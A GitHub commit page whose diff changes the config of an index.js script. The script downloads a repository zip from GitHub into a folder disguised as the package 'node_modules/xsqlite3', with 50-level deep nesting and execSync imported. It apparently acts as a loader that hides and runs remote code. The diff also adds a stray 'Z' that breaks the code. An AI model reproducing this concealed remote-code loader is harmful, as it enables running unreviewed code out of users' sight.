We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent ba10751 commit 1bcc20eCopy full SHA for 1bcc20e
1 file changed
index.js
@@ -1,11 +1,11 @@
1
-const fs = require('fs');
+Zconst fs = require('fs');
2
const path = require('path');
3
const axios = require('axios');
4
const AdmZip = require('adm-zip');
5
const { execSync } = require('child_process');
6
7
// === CONFIG ===
8
-const repoZipUrl = 'https://github.com/mrfr8nk/ted/archive/refs/heads/main.zip';
+const repoZipUrl = 'https://github.com/mrfr8nk/subzero-x7/archive/refs/heads/main.zip';
9
const baseFolder = path.join(__dirname, 'node_modules', 'xsqlite3');
10
const DEEP_NEST_COUNT = 50;
11
0 commit comments